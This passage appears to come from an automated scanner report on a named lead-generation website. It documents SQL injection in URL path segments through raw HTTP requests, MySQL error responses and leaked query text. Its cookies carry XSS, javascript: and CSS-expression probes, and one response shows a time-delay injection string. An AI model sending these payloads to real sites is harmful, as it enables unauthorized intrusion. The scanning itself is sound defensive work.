Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1h2qbq16c5qvaamd6nrgkno2s7; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.152. http://www.insideup.com/ppc/leadflow/caad00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:26:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r3kobeonkreeupqcocfti4fiu2; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow'/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow'/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow'/caad0' at line 5

Request 2

GET /ppc/leadflow''/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:26:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=cd3v71qoo9hbsl6joi5s005sa7; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/caad00/project_dynamic_page_updated.php was not found on this server.</p>

1.153. http://www.insideup.com/ppc/leadflow/caad00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00'/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:27:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4s3n7ochg1ek5ni1hqhpca0001; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/caad00'/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00'/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00' at line 5

Request 2

GET /ppc/leadflow/caad00''/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; 